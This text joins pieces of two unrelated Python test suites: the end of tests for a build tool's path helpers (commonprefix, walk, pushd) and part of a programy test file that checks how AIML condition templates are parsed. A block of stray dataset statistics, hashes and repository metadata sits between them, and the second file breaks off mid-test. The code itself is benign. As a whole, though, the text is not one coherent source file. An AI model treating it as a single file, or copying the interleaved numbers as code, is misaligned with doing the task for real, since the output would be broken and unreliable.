        same = path.Path('foo/bar')
        self.assertPathEqual(path.commonprefix([same, same]), same)

    def test_multi_partial_match(self):
        a = path.Path('foo/bar')
        b = path.Path('foo/baz')
        self.assertPathEqual(path.commonprefix([a, b]), path.Path('foo/'))

    def test_multi_subset(self):
        a = path.Path('foo/bar')
        b = path.Path('foo/bar/baz')
        self.assertPathEqual(path.commonprefix([a, b]), path.Path('foo/bar/'))

    def test_multi_no_match(self):
        a = path.Path('foo/bar')
        b = path.Path('baz/quux')
        self.assertPathEqual(path.commonprefix([a, b]), path.Path(''))
class TestUniqueTrees(TestCase):
    """Tests for path.uniquetrees(): minimal set of covering subtrees,
    sorted."""

    def test_empty(self):
        self.assertEqual(path.uniquetrees([]), [])

    def test_disjoint(self):
        # No path contains another; all are kept, in sorted order.
        first, second, third = (path.Path(s) for s in ('a', 'b/c/d', 'e/f'))
        self.assertEqual(path.uniquetrees([second, third, first]),
                         [first, second, third])

    def test_common_base(self):
        # Everything under 'a' collapses into it.
        base = path.Path('a')
        nested = [path.Path(s) for s in ('a/b/c', 'a/c/a', 'a/b')]
        self.assertEqual(path.uniquetrees(nested + [base]), [base])

    def test_mixed(self):
        ab = path.Path('a/b')
        ad = path.Path('a/d')
        cab = path.Path('c/a/b')
        self.assertEqual(path.uniquetrees([path.Path('a/b/c'), ab, cab, ad]),
                         [ab, ad, cab])

    def test_different_roots(self):
        # Identical suffixes under different roots stay separate trees.
        src = path.Path('a/b', path.Root.srcdir)
        bld = path.Path('a/b', path.Root.builddir)
        inputs = [path.Path('a/b/c', path.Root.srcdir), bld,
                  path.Path('a/b/c', path.Root.builddir), src]
        self.assertEqual(path.uniquetrees(inputs), [src, bld])
class TestWrappedOsPath(TestCase):
    """Tests for path._wrap_ospath()."""

    def test_wrap(self):
        # The wrapper converts Path arguments to native strings before
        # delegating to the wrapped os.path function.
        inner = mock.MagicMock(return_value=True)
        inner.__name__ = 'foo'
        wrapped = path._wrap_ospath(inner)
        wrapped(path.Path('/foo/bar'))
        inner.assert_called_once_with(os.path.join(os.path.sep, 'foo', 'bar'))
class TestSamefile(TestCase):
    """Tests for path.samefile()."""

    def test_samefile(self):
        # Stub os.path.samefile with plain equality (create=True covers
        # platforms that lack it).
        with mock.patch('os.path.samefile', lambda x, y: x == y, create=True):
            same = path.samefile(path.Path('/foo/bar'), path.Path('/foo/bar'))
            self.assertEqual(same, True)
class TestListdir(TestCase):
    """Tests for path.listdir()."""

    path_vars = {path.Root.builddir: None}

    def test_listdir(self):
        with mock_filesystem():
            dirs, files = path.listdir(path.Path('.'), self.path_vars)
            self.assertPathListEqual(dirs, [path.Path('dir/')])
            self.assertPathListEqual(files, [path.Path('file.cpp')])

    def test_not_found(self):
        # A missing directory yields empty results instead of raising.
        def raise_oserror(dirname):
            raise OSError()

        with mock.patch('os.listdir', raise_oserror):
            dirs, files = path.listdir(path.Path('.'), self.path_vars)
            self.assertEqual(dirs, [])
            self.assertEqual(files, [])
class TestWalk(TestCase):
    """Tests for path.walk()."""

    path_vars = {path.Root.builddir: None}

    def test_exists(self):
        P = path.Path
        with mock_filesystem():
            walked = list(path.walk(P('.'), self.path_vars))
            self.assertEqual(walked, [
                (P('.'), [P('dir')], [P('file.cpp')]),
                (P('dir'), [P('dir/sub')], [P('dir/file2.txt')]),
                (P('dir/sub'), [], []),
            ])

    def test_not_exists(self):
        with mock.patch('bfg9000.path.exists', return_value=False):
            walked = list(path.walk(path.Path('.'), self.path_vars))
            self.assertEqual(walked, [])

    def test_link(self):
        # Symlinked directories are reported but not descended into.
        def fake_islink(p, variables=None):
            return p.basename() == 'dir'

        P = path.Path
        with mock_filesystem(islink=fake_islink):
            walked = list(path.walk(P('.'), self.path_vars))
            self.assertEqual(walked, [
                (P('.'), [P('dir')], [P('file.cpp')]),
            ])
class TestPushd(TestCase):
    """Tests for the path.pushd() context manager."""

    def test_basic(self):
        with mock.patch('os.getcwd', return_value='cwd'), \
             mock.patch('os.chdir') as chdir:  # noqa
            with path.pushd('foo'):
                self.assertEqual(chdir.mock_calls, [mock.call('foo')])
            # On exit, the original directory is restored.
            self.assertEqual(chdir.mock_calls,
                             [mock.call('foo'), mock.call('cwd')])

    def test_makedirs(self):
        with mock.patch('os.makedirs') as makedirs, \
             mock.patch('os.getcwd', return_value='cwd'), \
             mock.patch('os.chdir') as chdir:  # noqa
            with path.pushd('foo', makedirs=True):
                self.assertEqual(makedirs.mock_calls,
                                 [mock.call('foo', 0o777, False)])
                self.assertEqual(chdir.mock_calls, [mock.call('foo')])
            self.assertEqual(chdir.mock_calls,
                             [mock.call('foo'), mock.call('cwd')])

    def test_exception(self):
        # The original directory is restored even when the body raises.
        with mock.patch('os.getcwd', return_value='cwd'), \
             mock.patch('os.chdir') as chdir:  # noqa
            with self.assertRaises(ValueError):
                with path.pushd('foo'):
                    self.assertEqual(chdir.mock_calls, [mock.call('foo')])
                    raise ValueError('uh oh!')
            self.assertEqual(chdir.mock_calls,
                             [mock.call('foo'), mock.call('cwd')])
| 42.166848
| 79
| 0.569349
| 4,599
| 38,667
| 4.737987
| 0.04501
| 0.165902
| 0.158605
| 0.071868
| 0.849564
| 0.825103
| 0.792015
| 0.761313
| 0.716521
| 0.672602
| 0
| 0.001236
| 0.267489
| 38,667
| 916
| 80
| 42.212882
| 0.768077
| 0.000491
| 0
| 0.478203
| 0
| 0
| 0.070698
| 0.002277
| 0
| 0
| 0
| 0
| 0.455746
| 1
| 0.083223
| false
| 0
| 0.010568
| 0.005284
| 0.117569
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9377cff855a10075ed0259629d2f102f9e41ec33
| 87,457
|
py
|
Python
|
dialogue-engine/test/programytest/parser/template/graph_tests/test_condition.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 104
|
2020-03-30T09:40:00.000Z
|
2022-03-06T22:34:25.000Z
|
dialogue-engine/test/programytest/parser/template/graph_tests/test_condition.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 25
|
2020-06-12T01:36:35.000Z
|
2022-02-19T07:30:44.000Z
|
dialogue-engine/test/programytest/parser/template/graph_tests/test_condition.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 10
|
2020-04-02T23:43:56.000Z
|
2021-05-14T13:47:01.000Z
|
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import xml.etree.ElementTree as ET
from programy.parser.template.nodes.base import TemplateNode
from programy.parser.template.nodes.condition import TemplateConditionNode
from programy.parser.template.nodes.condition import TemplateConditionListItemNode
from programy.parser.template.nodes.condition import TemplateConditionVariable
from programytest.parser.template.graph_tests.graph_test_client import TemplateGraphTestClient
class TemplateGraphConditionTests(TemplateGraphTestClient):
##################################################################################################################
# Block (type1)
#
def test_condition_template_block_typename_attributes(self):
template = ET.fromstring("""
<template>
<condition name="aname" value="avalue">
X
<random>
<li>1</li>
<li>2</li>
</random>
Y
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(template_node.loop)
self.assertEqual(len(template_node.children), 3)
def test_condition_template_block_typedata_attributes(self):
template = ET.fromstring("""
<template>
<condition data="aname" value="avalue">
X
<random>
<li>1</li>
<li>2</li>
</random>
Y
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(template_node.loop)
self.assertEqual(len(template_node.children), 3)
def test_condition_template_block_typevar_attributes(self):
template = ET.fromstring("""
<template>
<condition var="aname" value="avalue">
X
<random>
<li>1</li>
<li>2</li>
</random>
Y
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.LOCAL)
self.assertEqual(len(template_node.children), 3)
def test_condition_template_block_bot_attributes(self):
template = ET.fromstring("""
<template>
<condition bot="aname" value="avalue">
X
<random>
<li>1</li>
<li>2</li>
</random>
Y
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.BOT)
self.assertEqual(len(template_node.children), 3)
def test_condition_template_block_typename_name_attr_val_child(self):
template = ET.fromstring("""
<template>
<condition name="aname">
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typedata_name_attr_val_child(self):
template = ET.fromstring("""
<template>
<condition data="aname">
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.DATA)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typevar_name_attr_val_child(self):
template = ET.fromstring("""
<template>
<condition var="aname">
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.LOCAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_bot_name_attr_val_child(self):
template = ET.fromstring("""
<template>
<condition bot="aname">
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.BOT)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typename_name_child_val_attr(self):
template = ET.fromstring("""
<template>
<condition value="avalue">
<name>aname</name>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typedata_name_child_val_attr(self):
template = ET.fromstring("""
<template>
<condition value="avalue">
<data>aname</data>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.DATA)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typevar_name_child_val_attr(self):
template = ET.fromstring("""
<template>
<condition value="avalue"><var>aname</var>X</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.LOCAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_bot_name_child_val_attr(self):
template = ET.fromstring("""
<template>
<condition value="avalue">
<bot>aname</bot>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.BOT)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typename_name_child_val_child(self):
template = ET.fromstring("""
<template>
<condition>
<name>aname</name>
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typedata_name_child_val_child(self):
template = ET.fromstring("""
<template>
<condition>
<data>aname</data>
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.DATA)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_typevar_name_child_val_child(self):
template = ET.fromstring("""
<template>
<condition>
<var>aname</var>
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.LOCAL)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_block_bot_name_child_val_child(self):
template = ET.fromstring("""
<template>
<condition>
<bot>aname</bot>
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.BOT)
self.assertEqual(len(template_node.children), 1)
def test_condition_template_duplicate_typename(self):
template = ET.fromstring("""
<template>
<condition>
<name>aname</name>
<value>avalue</value>
<name>aname</name>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_duplicate_typedata(self):
template = ET.fromstring("""
<template>
<condition>
<data>aname</data>
<value>avalue</value>
<data>aname</data>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_duplicate_typevar(self):
template = ET.fromstring("""
<template>
<condition>
<var>aname</var>
<value>avalue</value>
<var>aname</var>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_duplicate_typebot(self):
template = ET.fromstring("""
<template>
<condition>
<bot>aname</bot>
<value>avalue</value>
<bot>aname</bot>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_name_and_data(self):
template = ET.fromstring("""
<template>
<condition name="name">
<data>aname</data>
<value>avalue</value>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_name_and_var(self):
template = ET.fromstring("""
<template>
<condition name="name">
<var>aname</var>
<value>avalue</value>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_data_and_bot(self):
template = ET.fromstring("""
<template>
<condition data="name">
<bot>aname</bot>
<value>avalue</value>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_multi_value(self):
template = ET.fromstring("""
<template>
<condition>
<value>avalue</value>
<bot>aname</bot>
<value>avalue</value>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_loop(self):
template = ET.fromstring("""
<template>
<condition>
<name>name</name>
<value>value</value>
<loop />
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_block_li(self):
template = ET.fromstring("""
<template>
<condition>
<data>name</data>
<value>value</value>
<li>X</li>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
##################################################################################################################
# Single (type2)
#
def test_condition_template_single_typename_name_child_value_attrs(self):
template = ET.fromstring("""
<template>
<condition>
<name>aname</name>
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_single_typename_name_child_value_attrs_loop(self):
template = ET.fromstring("""
<template>
<condition>
<name>aname</name>
<li value="a">A <loop /></li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertEqual(len(template_node.children), 4)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertTrue(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "A")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "B")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "C")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "D")
def test_condition_template_single_typedata_name_child_value_attrs(self):
    """Condition whose predicate name comes from a <data> child element;
    each <li> supplies its own value (attribute or child element) and the
    bare <li> acts as the default branch."""
    template = ET.fromstring("""
<template>
<condition>
<data>aname</data>
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(condition.var_type, TemplateConditionVariable.DATA)
    self.assertEqual(condition.name.children[0].word, "aname")
    self.assertEqual(len(condition.children), 4)
    # (resolved text, has <loop/>, is the default <li>)
    expectations = [("A", False, False),
                    ("B", False, False),
                    ("C", False, False),
                    ("D", False, True)]
    for index, (word, loops, default) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.DATA)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNone(item.name)
        if default:
            self.assertIsNone(item.value)
            self.assertTrue(item.is_default())
        else:
            self.assertIsInstance(item.value, TemplateNode)
            self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), word)
def test_condition_template_single_typedata_name_child_value_attrs_loop(self):
    """Same as the non-loop variant, but the second <li> carries a <loop/>
    tag, which must set that list item's loop flag only."""
    template = ET.fromstring("""
<template>
<condition>
<data>aname</data>
<li value="a">A</li>
<li value="b">B <loop /></li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(condition.var_type, TemplateConditionVariable.DATA)
    self.assertEqual(condition.name.children[0].word, "aname")
    self.assertEqual(len(condition.children), 4)
    # (resolved text, has <loop/>, is the default <li>)
    expectations = [("A", False, False),
                    ("B", True, False),
                    ("C", False, False),
                    ("D", False, True)]
    for index, (word, loops, default) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.DATA)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNone(item.name)
        if default:
            self.assertIsNone(item.value)
            self.assertTrue(item.is_default())
        else:
            self.assertIsInstance(item.value, TemplateNode)
            self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), word)
def test_condition_template_single_typevar_name_child_value_attrs(self):
    """Condition whose predicate name comes from a <var> child element
    (LOCAL scope); list items carry their own values and the bare <li>
    is the default branch."""
    template = ET.fromstring("""
<template>
<condition>
<var>aname</var>
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(condition.var_type, TemplateConditionVariable.LOCAL)
    self.assertEqual(condition.name.children[0].word, "aname")
    self.assertEqual(len(condition.children), 4)
    # (resolved text, has <loop/>, is the default <li>)
    expectations = [("A", False, False),
                    ("B", False, False),
                    ("C", False, False),
                    ("D", False, True)]
    for index, (word, loops, default) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.LOCAL)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNone(item.name)
        if default:
            self.assertIsNone(item.value)
            self.assertTrue(item.is_default())
        else:
            self.assertIsInstance(item.value, TemplateNode)
            self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), word)
def test_condition_template_single_typevar_name_child_value_attrs_loop(self):
    """Same as the non-loop <var> variant, but the third <li> carries a
    <loop/> tag, which must set that list item's loop flag only."""
    template = ET.fromstring("""
<template>
<condition>
<var>aname</var>
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C <loop /></li>
<li>D</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(condition.var_type, TemplateConditionVariable.LOCAL)
    self.assertEqual(condition.name.children[0].word, "aname")
